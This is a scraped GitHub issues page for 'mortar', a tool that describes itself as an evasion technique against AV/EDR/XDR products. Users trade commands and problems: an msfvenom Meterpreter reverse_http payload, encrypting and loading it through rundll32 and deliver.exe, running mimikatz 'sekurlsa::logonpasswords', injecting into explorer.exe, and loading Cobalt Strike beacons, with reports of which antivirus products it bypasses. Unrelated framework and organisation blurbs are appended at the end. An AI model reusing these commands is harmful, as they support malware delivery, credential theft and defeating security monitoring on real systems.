0xsp-srd / mortar Goto Github PK
View Code? Open in Web Editor NEWevasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
License: MIT License
evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
License: MIT License
Both agressor and deliver are detected by windows defender.
First, I tried to encrypt an exe the encryptor works fine but when I load it in the target machine it loads and it doesn't show errors but when I get back to the attacker machine nothing happened.
Second , I tried to use the shellcode by following the instruction in https://0xsp.com/offensive/mortar-loader-v2/ and it not working again please review your code.
Note : I've tried both in a windows target.
Is there a way to have the compile instructions?
Lazarus project doesnt really provides instructions on how to compile a project. Neither the github for this release.
While compiling agressor with the release version, it shows three lines error.
syscalls.RPM(PI.hProcess, Pointer(CONT.rdx + $100), @addr, 4, Ret);
// runner.pas(134,52) Error: identifier idents no member "rdx"
syscalls.W_M(PI.hProcess, LPVOID(CONT.rdx + $10), @ImageBASE, 8, Ret);
// runner.pas(179,53) Error: identifier idents no member "rdx"
CONT_B.rcx := dword64(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
// runner.pas(190,22) Error: identifier idents no member "rcx"
I'm running a fresh Windows 10, updated, with all Defender protection disabled for testing.
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
I can't seem to get the shellcode or shell binary to execute.
For example, create shell...
root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.x.x.x LPORT=8080 -f exe -o shell64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 713 bytes
Final size of exe file: 7168 bytes
Saved as: shell64.exe
At this point, manually executing the binary connects fine: Meterpreter session 1 opened (172.x.x.x:8080 -> 127.0.0.1)
However, encrypting and running with rundll32 doesn't work...
C:\Users\user\Desktop>C:\Users\user\Documents\GitHub\mortar\Encryptor\encryptor.exe -f shell64.exe -o bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a
[+] Encrypting the binary ...
[!] content is written to bin.enc
C:\Users\user\Desktop> rundll32.exe agressor.dll,start
At this point, I don't see any network traffic on the victim host.
It appears to trigger werfault.exe
C:>deliver.exe -d -f bin.enc
Exception at 0000000100010930: EReadError:
Stream read error
there is little problem in your Readme , it is "sekurlsa::logonpasswords "" not "sekurlasa::logonpasswords"
deliver.exe -d -c sekurlasa::logonpasswords -f mimikatz.enc --->deliver.exe -d -c sekurlsa::logonpasswords -f mimikatz.enc
and then.. I want to confirm one thing . i test this command deliver.exe -d -c version -f bin.enc
and it execute successful . But trigger the karspersky (may be memory scan) after a few seconds , You also tested this mentioned in your article and didn't this problem occur at the time?
Hi,
Mortar is a awesome project! But, I have some trouble that i get a error with "encryptor has not main source file" when i use kail to build the encryptor project. I don't know why. Can you provide a encryptor file and a calc.enc file ? Thank you please ~
i've got the bin.enc but where is dll
Hi,
Firstly, absolutely love the work! Very much appreciate it.
Is there anyway to make the injection process stealthier? At the moment, a cmd window is launched and simply stays there, closing it also ends the meterpreter session. I've attempted to recompile the loader and inject into different processes such as 'svchost.exe' and 'explorer.exe' via
bin_decryptor('c:\\windows\\explorer.exe');
or fork_P_x64('C:\\windows\\explorer.exe',runner.TByteArray(AMemStr2.memory),processhandle);
yet only the CMD window opens and nothing else, and again closing the CMD window ends the session.
also, I know literally nothing about the pascal language
Does this work on dotnet payloads, I also have issues following the readme, I conpiled each of them in their individual folders, but i still couldn't figure out how to use it. I don't know pascal programming language.
Hello, the dll was deleted by defander, the enc file was not deleted
you able to pass commands for the loaded binary
you deleted the exe, how do i pass the command
I need the program to receive commands
bin.enc is an encrypted CS Beacon, tried to create the following batch file and launch it.
@echo off
cmd.exe /c rundll32.exe agressor.dll,stealth
Beacon connection was failed and Cortex XDR blocked with "Rule ioc.cobalt_strike_named_pipe"
Any idea? Thanks.
From today Microsoft defender started detecting it as Virus tool with label VirTool/Win64Mortar :\
Hello lawrenceamer, hope you are well.
I have a question, how can I call the export function "dec" and execute it when I injected the dll into "cmd.exe" process, or what is the technique, the reflective injector you are used to do that.
because when I injected the dll into the cmd.exe process it is just injected and didn't execute "dec" function to run the ".enc" payload.
I'm having the same issue as nathan-bowman. The encryptor works. I compile the DLL, but I can't run it. I have compiled it on 3 different systems (all windows x64-one windows 10, two windows 11, one bare-metal two VM's). I've tried to run it with the mimikats.enc. (rundll32.exe agressor.dll,start), also on multiple machines. Nothing happens.
Hi, this works amazingly well with mimikatz against multiple antivirus products that i have tested. (Windows Defender, McAfee, Eset, Norton, Bitdefender and Avast)
But i still have a question, is there a way where we could apply this technique to other tools that run once, such as WinPEAS or PowerUp?
Following situation, I'm generating a Windows Executable through Cobalt Strike, then I encrypt that file with the encrypter and load it with deliver.exe . AV did not recognize anything, beacon connects and then exits pretty fast after calling home
[*] Tasked beacon to run: whoami
[+] host called home, sent: 45 bytes
[+] beacon exit.
Tried multiple times but no chance to get it working, any idea?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.